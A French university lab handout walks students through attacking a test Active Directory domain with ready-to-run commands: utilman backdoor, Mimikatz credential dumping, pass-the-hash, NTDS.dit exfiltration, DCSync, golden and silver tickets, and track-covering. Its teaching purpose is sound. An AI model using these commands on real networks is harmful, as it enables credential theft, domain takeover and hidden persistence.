TP Active Directory INSA

Objectifs du TP : Evaluer et expérimenter des attaques sur

l’environnement Microsoft (postes clients Windows et annuaire
Active Directory)
Vous disposez de :
 1 serveur Windows 2016 server en tant que contrôleur de domaine « Active
Directory » sur le domaine « ADTEST.NET »
 1 Windows Seven intégré au domaine Adtest.net : W7
 1 Windows 10 intégré au domaine Adtest.net : W10

Important : Pour effectuer ce TP, vous ne serez plus administrateur de votre

domaine. Le mot de passe du ou des comptes « administrateur » sont détenus
par le formateur. L’objectif est de récupérer cet accès administrateur par
différents moyens.

Table des matières

Attaques sur le poste client ..................................................................................................................... 2
Compromission du poste Windows 7 pour récupérer les privilèges « administrateur » ................... 2
Extraction des mots de passe des comptes locaux d’un poste Windows Seven ................................ 3
Extraction du hash du mot de passe d’un compte administrateur de domaine connecté à un poste
Windows 10 ......................................................................................................................................... 4
Attaques sur l’annuaire Active Directory ................................................................................................ 7
Attaque « Pass the Hash » avec Mimikatz » ....................................................................................... 7
Exfiltration de la base « Ntds.dit » du contrôleur de domaine .......................................................... 9
Exfiltration du fichier « NTDS.dit » .................................................................................................. 9
Extraction des « hashes » des mots de passe de la base Active Directory ................................... 11
Utilisation de tickets Kerberos à des fins de persistance .................................................................. 13
Génération de « Golden ticket » .................................................................................................. 13
Génération de « Silver ticket » ..................................................................................................... 15
Annexes ................................................................................................................................................. 16
Les commandes NET.ACCOUNTS / NET USER / NET GROUP ............................................................. 16
Liste de quelques SID bien connus .............................................................. Erreur ! Signet non défini.
Attaques sur le poste client
Compromission du poste Windows 7 pour récupérer les privilèges « administrateur »
Objectif de l’attaque : - Compromettre le poste et récupérer les droits administrateurs pour un compte
non-administrateur sans passer par l’outil d’attribution des droits Windows
On veut obtenir les droits administrateurs du poste local pour un compte qui n’est pas administrateur
afin d’avoir les privilèges d’utiliser l’outil Mimikatz par exemple qui a besoin du privilège debug.
Matériel : Poste Windows 7 et Contrôleur de Domaine
Outil : ISO Windows Seven

Opérations

 Se connecter avec le compte « stage », utilisateur local non-administrateur

 Compromettre le poste et récupérer les droits administrateurs sans passer par l’outil d’attribution
des droits Windows
 Redémarrer sur le CD Windows 7
 Se positionner dans l’environnement de la vm « W7 » et cliquer sur une touche de votre clavier
pour démarrer l’amorçage du CD. La fenêtre suivante d’installation Windows 7 doit apparaitre

 Cliquer sur « suivant »

 Cliquer sur réparer l’ordinateur
 Cliquer sur « charger les pilotes »
 Cliquer sur « OK »

 Aller dans d:\windows\system32 en cliquant sur « ordinateur »

✓ Renommer l’exécutable « utilman » en utilmanold
✓ Faire une copie de cmd.exe
✓ Renommer « cmd » en « utilman »
 Redémarrer la machine en annulant l’installation en cours
✓ Cliquer sur les options d’ergonomie, le shell « cmd » s’ouvre avec les droits administrateurs

 Rajouter le groupe administrateurs à votre compte utilisateur en utilisant la commande Net

localgroup : net localgroup administrateurs <votre compte> /add
 Vous pouvez également changer le mot de passe du compte administrateur local de votre
machine Net user <compte administrateur> <mot de passe>
 Se connecter avec votre utilisateur qui appartient maintenant au groupe administrateur
 Aller dans « C:\Windows\System32 » et renommer le fichier « cmd-copie » en cmd

 Démarrer, exécuter l’interpréteur de commande en tant qu’administrateur

 Exécution de la commande Net user <votre compte>
Pour bien visualiser que vous avez récupérés les Droits administrateurs local pour votre compte
Question : Quels sont à votre avis les moyens pour protéger un poste client d’une intrusion
physique
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Extraction des mots de passe des comptes locaux d’un poste Windows Seven

Objectif de l’attaque : extraire le mot de passe des comptes locaux d’un poste Windows Seven.
Récupérer le mot de passe d’un compte administrateur.
Matériel : Poste Windows 7 et Contrôleur de Domaine
Outil : Mimikatz dans c:\outils

Le formateur va se connecter avec le compte administrateur local « admin » dont vous ne connaissez
pas le mot de passe. On simule la connexion d’un administrateur qui laisse sa session ouverte mais
verrouillée.
Vous aller utiliser le compte « stage » qui est maintenant « administrateur »du poste

Se connecter avec le compte local « stage » (mot de passe P@ssw0rd). (Prérequis : être administrateur
du poste, le compte doit être administrateur local depuis le TP précédent.
Lancer l’utilitaire mimikatz en tant qu’administrateur, la fonctionnalité « Sekurlsa » de l’utilitaire
mimikatz fournit la fonctionnalité d'extraction de mots de passe, de hachages et de tickets en abusant
de la mémoire de LSASS.exe (Local Security Authority Subsystem Service)

À l’aide de Mimikatz, et plus particulièrement du module sekurlsa, nous pouvons extraire les mots de
passe en clair de tous les utilisateurs locaux ou de domaines (et services) ayant une session ouverte

 Lancer Mimikatz qui se trouve dans le répertoire « outils »

 Il est nécessaire d’attribuer le privilège « Debug »

mimikatz # privilege::debug
Si la commande s’est bien exécutée, un message confirme la bonne obtention des droits.

 Extraire le mot de passe des sessions en cours

Sekurlsa ::logonpasswords full

Vérifier que les mots de passe et les hash apparaissent bien pour les algorithmes LM, NTLM et SHA1
Nous sommes à présent en possession des mots de passe en clair stockés dans le service LSASS.

Question : Qu’est-ce que le processus LSASS dans un système Windows ? Que permet -il de faire ?
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Question : Qu’est-ce qu’un privilège ?
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Extraction du hash du mot de passe d’un compte administrateur de domaine connecté
à un poste Windows 10

Objectif de l’attaque : extraire le hash du compte administrateur de domaine

Matériel : Poste Windows 10 et Contrôleur de Domaine
Outil : mimikatz et Powersploit

L’utilitaire Mimikatz est un outil bien connu et détecté par les antivirus et système de détection.
Microsoft a implémenté sur ces systèmes d’exploitation récents des protections pour éviter comme
pour le cas de Windows l’extraction en direct des mots de passe et des « hashes » de mot de passe.
On peut contourner cela avec d’autres outils et utiliser mimikatz pour analyser le fichier dump
généré par l’outil powershell.
Important : pour effectuer ce TP il est nécessaire, que l’administrateur de votre domaine (le
formateur) se connecte sur votre poste et laisse la session en cours mais verrouillée. On peut faire
sans problème du multi utilisateurs dans Windows.

1. Connecter vous avec le compte « admin » local. On suppose que vous avez récupéré le mot
de passe « admin » de la précédente manipulation sur le poste W7. Par chance le même mot
de passe fonctionne pour le compte « admin » sur le poste W10 . Malheureusement cela
peut arriver surtout pour les postes d’une même version d’OS…

2. Installer le module powershell « powersploit » fournit et placer le dans répertoire des

modules powershell « C:\Windows\System32\WindowsPowershell\v1.0\Modules ». Copier
le dossier complet « powersploit » dans le répertoire indiqué.

3. Vérifier que le module « powersploit » est bien disponible Get-Module -listavalaible

4. Importer le module dans une commande « powershell » Import-Module Powersploit

Si problème d’exécution du script, lancer la commande suivante :
« Set-ExecutionPolicy -ExecutionPolicy RemoteSigned »

5. Se placer dans le répertoire « Exfiltration » du dossier « powersploit » et lancer la commande

« .\Invoke-Mimikatz.ps1 »

6) Générer un dump du processus « lsass » en tapant la commande suivante :

Get-Process lsass | out-Minidump
7) Avec l’outil Mimikatz on peut récupérer le hash du compte administrateur du domaine à
partir de l’extraction du dump. Lancer l’outil « mimikatz » en tant qu’administrateur et taper
les commandes suivantes :
privilege::debug
sekurlsa::minidump C:\Outils\PowerSploit\Exfiltration\lsass_XXX.dmp (votre dump généré)
sekurlsa::logonpasswords

Le Hash du compte administrateur du domaine est maintenant récupéré, on peut lancer une attaque
« pass the hash » vers le contrôleur de domaine
Redémarrer le poste W10 après avoir sauvegardé dans un fichier texte les « hash » du compte INSA.
La session active « Insa » laissée par l’administrateur sera réinitialisée.
Question : Décrire brièvement l’attaque « pass the hash ». Que permet -elle de faire ?
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Attaques sur l’annuaire Active Directory
Attaque « Pass the Hash » avec Mimikatz »
https://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/

Objectif de l’attaque : mettre en œuvre l’attaque « Pass the hash » pour obtenir un shell sur le
contrôleur de domaine. On se sert de mimikatz pour faire l’attaque.
On a récupéré le hash du compte administrateur de domaine
✓ Soit sur un poste
✓ Soit depuis la base « ntds.dit »
Matériel : Poste Windows 10 et Contrôleur de Domaine
Outils : mimikatz

privilege ::debug
sekurlsa :: pth /user: USERNAME /domain: DOMAIN /ntlm: HASH /run: COMMAND

 Ouvrir une session avec son compte local Windows sur le poste Seven. Le compte doit être
administrateur local
 Lancer l’interpréteur de commande « cmd » en tant qu’administrateur

 Lancer l’outil « mimikatz »

 Lancer les commandes suivantes dans « mimikatz », bien renseigner le nom du compte
administrateur du domaine ainsi que son « hash » (exemple)
privilege ::debug
sekurlsa::pth /user:insa /domain:adtest.net /ntlm:ad7b43bbbc065453dd85e2bd49769aa9

La commande lancée dans mimikatz a généré une nouvelle fenêtre de commandes et donc un
nouveau processus « cmd » en modifiant son jeton d'accès. L’identité est toujours le compte
utilisateur local.

 Lancer un shell sur le contrôleur de domaine

On va lancer maintenant une demande de connexion à distance sur le contrôleur de domaine avec
l’outil « PsExec64.exe »
cd \OUTILS
PsExec64.exe -acceptEula \\dctest.adtest.net cmd

Le process est maintenant connecté au contrôleur de domaine… avec l’identité de l’administrateur

de domaine !!

On peut maintenant lancer l’interpréteur « powershell », faire des recherches sur l’AD, créer un
compte et le rajouter dans le groupe admins du domaine pour un utilisateur (attention c’est peut-
être surveillé par un SIEM)

Lancer les commandes suivantes

Examiner la liste des utilisateurs du domaine
Net user
Examiner la liste des groupes du domaine
Net Localgroup

On peut également exécuter « powershell » et effectuer recherches ou des actions

Get-command -module activedirectory
Get-ADDomainController pour avoir des infos sur le contrôleur de domaine

Obtenir la liste des membres du domaine

Get-Adgroup "admins du domaine" -properties members

La commande « exit » permet de sortir de l’interpréteur de la commande « powershell »

Passer à la suite du TP pour l’exfiltration de la base « NTDS.DIT »

Question : Qu'est-ce que le fichier Ntds.dit ? Que contient -il ?

................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Qu’est -ce une clé d'amorçage (Boot Key) pour la base NTDS.DIT ? Que permet -elle de faire ?
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Exfiltration de la base « Ntds.dit » du contrôleur de domaine

Objectif de l’attaque : exfilter la base ActiveDirectory « NTDS.dit » du contrôleur de domaine et

extraire les « hashes » de la base de données
Matériel : Poste Windows 10 et Contrôleur de Domaine
Outils : mimikatz, ntdsutil, commandes « net »

Cette attaque est moins « connue » mais d’autant plus grave et efficace. Elle est axée sur
l'exfiltration du fichier Ntds.dit des contrôleurs de domaine Active Directory.
Méthode :
1-Exfiltration de la base « Ntds.dit »
2-Extraction des « hashes » des mots de passe de la base AD

Exfiltration du fichier « NTDS.dit »

 Utilisation de la commande « ntdsutil » utilisé pour la maintenance de l’Active Directory
Prérequis : il faut avoir accès au contrôleur de domaine. Par défaut (heureusement) les simples
utilisateurs du domaine ne peuvent pas se connecter au domaine Active Directory.
Nous allons utiliser cette méthode

Vous utilisez le « shell » du TP précédent pour faire cette opération

Lancer dans votre Shell la commande suivante qui va générer un backup de la base d’annuaire
ntdsutil.exe "Activate Instance NTDS" IFM "Create Full C:\windows\temp\ADBackup" Quit Quit
Cela va créer un répertoire « ADBackup » et faire une sauvegarde de la base de registre contenant la
« boot key »

Pour exfiltrer la base on va créer un compte utilisateur « agentsql », lui donner les droits
administrateurs et le supprimer une fois l’exfiltration réussie

 Création du compte
net user agentsql /add P@ssw0rd

 Lui attribuer le droit administrateur du domaine

net group "admins du domaine" agentsql /add

Sur le poste Windows, se connecter au contrôleur de domaine avec ce compte pour exfiltrer dans un
répertoire local la sauvegarde. On va se connecter sur un partage prédéfini c$ du contrôleur de
domaine en ouvrant l’explorateur Windows

 S’authentifier avec le compte précédemment créé sur la mire d’authentification et rapatrier en

local sur votre poste le dossier « ADBackup »
 Détruisez-le sur le contrôleur de domaine pour effacer les traces

Pour le prochain TP, exécuter les commandes suivantes en utilisant le compte de domaine
« agentSQL » afin d’extraire les secrets du compte « Krbtgt » et le compte de votre contrôleur de
domaine « DCtest$ » (attaque DCSync)
 Ouvrir l’interpréteur de commande « cmd » en tant que « agentsql »

 Exécuter les commandes suivantes

mimikatz.exe "lsadump::dcsync /user:DCtest$ /domain:adtest.net" "exit"
mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:adtest.net" "exit"
Exemple :

 Copier le résultat des commandes dans un fichier texte et les sauvegarder :

• Un pour le compte « krbtgt »
• Un pour le compte du contrôleur de domaine
 Détruisez le compte « agentSQL » pour effacer les traces
net user agentSQL /delete

Extraction des « hashes » des mots de passe de la base Active Directory

Sur le poste windows 10
Installer le module powershell « dsinternals » : copier le dossier fourni dans le répertoire des modules
powershell « C :\Windows\System32\WindowsPowershell\v1.0\Modules ».

a) Importer le module dans une commande « powershell » : Import-Module DSInternals

b) Vérifier que la copie de la base est intègre

Get-ADDBDomainController -DatabasePath 'c:\ADBackup\Active Directory\ntds.dit'

c) Récupérer la « boot key »

Get-BootKey -SystemHiveFilePath 'c:\ADBackup\registry\SYSTEM'

d) Extraire les « hashes » des mots de passes de tous les utilisateurs de l’Active Directory
Get-ADDBAccount -All -DatabasePath 'c:\ADBackup\Active Directory\ntds.dit' `
-BootKey 0b77be92cb7601bbf9dc3e29a8273aa6

Question : Quels sont les deux services de distribution du KDC (Key Distribution Center):
permettant de délivrer des tickets Kerberos ?
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................

Question : Quelles est la différence entre un « Golden Ticket » et un « Silver Ticket »

................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Utilisation de tickets Kerberos à des fins de persistance
Le domaine est compromis, vous aller générer des tickets kerberos permettant de vous passer de
l’AD et pouvoir cibler des services du domaine.
Rappel :
Kerberos est un protocole d'authentification, utilisé au sein d'Active Directory et reposant sur un
mécanisme de tickets, émis par deux services de distribution du KDC (Key Distribution Center):
 Les TGT (Ticket-Granting Ticket), obtenus auprès du service Authentication Service (AS)
 Les Tickets de service, obtenus auprès du service Ticket-Granting Service. (TGS)
 Les TGT sont chiffrés avec l'un des secrets (clé RC4, dont la valeur est identique au condensat
NTLM, ou clés AES 128/256 bits) du compte « krbtgt » du domaine et permettent l'obtention de
tickets de service.
 Les données d'autorisation de l'utilisateur sont conservées dans le PAC (Privilege Attribute
Certificate) des tickets, notamment son SID courant, ses SID conservés en historique et ses groupes
d'appartenance (locaux ou de domaine) et sont utilisées, par la suite, pour donner accès, ou non,
à l'utilisateur aux ressources.

Génération de « Golden ticket »

La génération de golden tickets peut être utilisée à des fins de persistances suite à la compromission
du domaine. La vérification de la validité d'un TGT est réalisée à la fois à l'aide des secrets courants
du compte « Krbtgt » et de l'historique des derniers secrets du compte « krbtgt ». Les TGT générés
restent valides même en cas de renouvellement unitaire du mot de passe du compte « krbtgt »…

Objectif de l’attaque : Générer un Golden Ticket pouvant par la suite être utilisé pour effectuer des
demandes de tickets de service
Matériel : Poste Windows 10 et Contrôleur de Domaine
Outils : mimikatz, les secrets du compte « Krbtgt » et du compte du contrôleur de domaine

Opérations
 Se connecte en administrateur local sur votre poste Windows 10
 Exécuter un interpréteur de commande « cmd » en tant qu’administrateur
 Elaborer la commande pour générer le « golden ticket »
Les paramètres sont à chercher dans le fichier « krbtgt.txt » que vous avez sauvegardés au TP
précédent.
/user: Nom du compte pour lequel le ticket de service sera émis (N’importe
quel compte, un compte qui n’existe pas sur le domaine !)
/krbtgt: secret NTLM du compte krbtgt de votre domaine dctest.adtest.net)
/sid: SID du domaine
/domain: Nom de domaine complètement qualifié du domaine.

Exemple :
mimikatz.exe "kerberos::golden /user:toto /domain:adtest.net /sid:S-1-5-21-2930356085-
3295678534-750826786 /krbtgt:bf3940eb4585e1a28381b27e670f300f" "exit"

Un fichier « ticket.kirbi » est généré. On va le charger en mémoire avec la commande suivante :

mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"

Vérifier que le ticket « TGT » est bien chargé dans votre session cmd courante avec la commande
« klist »
On va se connecter sur le contrôleur de domaine avec l’utilisateur « toto » qui n’existe pas et
récupérer automatiquement des tickets de service de la part du contrôleur de la machine à l’aide du
ticket TGT que l’on a forgé.

Lancer la commande suivante : PsExec64.exe -accepteula \\dctest.adtest.net cmd

On est sur le contrôleur de domaine avec un compte qui n’existe pas et on peut effectuer des actions
d’administration. Ce qui rend un pirate furtif et difficilement détectable.

En exécutant un « klist » (sortir de la session sur le contrôleur de domaine), on voit les tickets de
services qui ont été délivrés par le service KDC du contrôleur de domaine. On notera que la validité
des tickets délivrés est de 10h alors que la validité de notre ticket est de 10 ans !

Question : Quelles est la durée d’un ticket Kerberos Valide ?

................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................

Question : Quelle est la différence entre un Golden Ticket et un Silver Ticket ?

................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
................................................................................................................................................................
Génération de « Silver ticket »
Dans la majorité des cas, seule la connaissance d'un secret d’un compte de service est nécessaire pour
la génération de tickets de service et il n’est pas nécessaire de connaitre les secrets du compte
« krbtgt ».

De nombreux services peuvent être ciblés à des fins de persistance. Parmi ceux-ci, les services exposés
sur les contrôleurs de domaine présentent des propriétés intéressantes. De fait, les tickets de service
utilisés pour accéder aux services exposés par un compte machine sont émis avec les secrets du
compte machine, qui présentent l'avantage de ne pas être soumis à la même politique de rotation que
les secrets des comptes de service du domaine ou du compte « krbtgt »

Objectif de l’attaque : Générer un « Silver Ticket » pour cibler un service particulier (CIFS)
permettant d’exécuter l’utilitaire de connexion à distance « psExec.exe ».
Matériel : Poste Windows 10 et Contrôleur de Domaine
Outils : mimikatz, les secrets du compte « dctest$ » de votre contrôleur de domaine

Opérations
Exécuter la commande suivante dans votre interpréteur de commande pour purger les tickets :
Klist purge

Les paramètres sont à chercher dans le fichier « DCtest.txt » que vous avez sauvegardés au TP
précédent.
/user: Nom du compte pour lequel le ticket de service sera émis (ici un
compte qui n’exsite pas « toto »).
/aes256: Clé AES256 du compte machine ciblé (ici le contrôleur de
domaine dctest.adtest.net).
/sid: SID du domaine.
/domain: Nom de domaine complètement qualifié du domaine.
/target: Machine ciblé (ici le contrôleur de domaine dctest.adtest.net).
/service: Nom du service ciblé (ici service CIFS).
/ptt Permet d'injecter le ticket forgé directement dans la session
utilisateur courante.

Lancer la commande de génération de ticket en ligne de commande.

mimikatz.exe "kerberos::golden /user:toto /domain:adtest.net /sid:S-1-5-21-2930356085-
3295678534-750826786 /target:dctest.adtest.net
/aes256:0f795230016f65f6dc6898e63d2a2f84b1287a50bf9118194750579337ed013b /service:CIFS
/ptt" "exit"
Le ticket est généré et chargé automatiquement en mémoire. Il vise un service du contrôleur de
domaine
On va se connecter sur le contrôleur de domaine avec l’utilisateur « toto » qui n’existe pas avec ce
ticket de service que l’on a forgé. Il n’y a eu aucune action du contrôleur de domaine.
Lancer la commande suivante : PsExec64.exe -accepteula \\dctest.adtest.net cmd

On peut cibler n’importe quel service de n’importe quelle machine du domaine avec un compte qui
n’existe pas. Ce qui rend cette attaque difficile à détecter et facilite aux cyber attaquants les
opérations de dissimulation et de persistance à des fins d’espionnage ou d’exfiltration de données.
FIN DU TP
Annexes
Les commandes NET.ACCOUNTS / NET USER / NET GROUP

Les commandes NET sont utilisées dans les environnements Windows pour gérer les comptes et les
groupes des postes, serveurs et également possible les comptes du domaine

Syntaxe
NET ACCOUNTS [/FORCELOGOFF:{minutes | NO} ] [/MINPWLENGTH:length]
[/MAXPWAGE:{days | UNLIMITED}] [/MINPWAGE:days] [/UNIQUEPW:number] [/DOMAIN]
NET USER [username [password | *] [options]] [/DOMAIN]
NET USER username {password | *} /ADD [options] [/DOMAIN]
NET USER username [/DELETE] [/DOMAIN]
NET USER username [/TIMES:{times | ALL]
NET USER username [/ACTIVE: {YES | NO}]
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
NET GROUP groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
NET LOCALGROUP groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]
NET GROUP groupname username [...] {/ADD | /DELETE} [/DOMAIN]
NET LOCALGROUP groupname username [...] {/ADD | /DELETE} [/DOMAIN]
View the current password & logon restrictions for the computer (plus machine role: Server/
Workstation).
NET ACCOUNTS
View the current password & logon restrictions for the domain.
NET ACCOUNTS /DOMAIN
Set the number of minutes a user has before being forced to log off when the account expires or
valid logon hours expire
NET ACCOUNTS /FORCELOGOFF:minutes /DOMAIN
View user account details
NET USER [/DOMAIN]
Add a user account.
NET USER username {password | *} /ADD [options] [/DOMAIN]
Modify a user account.
NET USER [username [password | *] [options]] [/DOMAIN]
Delete a username
NET USER username [/DELETE] [/DOMAIN]
Generate a random password:
NET USER administrator /random
Add a group
NET GROUP groupname /ADD [/COMMENT:"text"] [/DOMAIN]
NET LOCALGROUP groupname /ADD [/COMMENT:"text"] [/DOMAIN]
Edit a group
NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN]
Delete a group
NET GROUP groupname /DELETE [/DOMAIN]
NET LOCALGROUP groupname /DELETE [/DOMAIN]
Add a user to a group
NET GROUP groupname username [...] /ADD [/DOMAIN]
NET LOCALGROUP groupname username [...] /ADD [/DOMAIN]
Delete a user from a group
NET GROUP groupname username [...] /DELETE [/DOMAIN]
NET LOCALGROUP groupname username [...] /DELETE [/DOMAIN]
LOCALGROUP will create/modify a group that is local to the computer rather than an Active Directory
domain-wide group.

Examples
Create a group
C:\> NET LOCALGROUP spud /add
Add to guests
C:\> NET LOCALGROUP guests spud /add
Then remove
C:\> NET LOCALGROUP guests spud /delete
C:\> NET LOCALGROUP spud /delete

Lien

https://ss64.com/nt/net-useradmin.html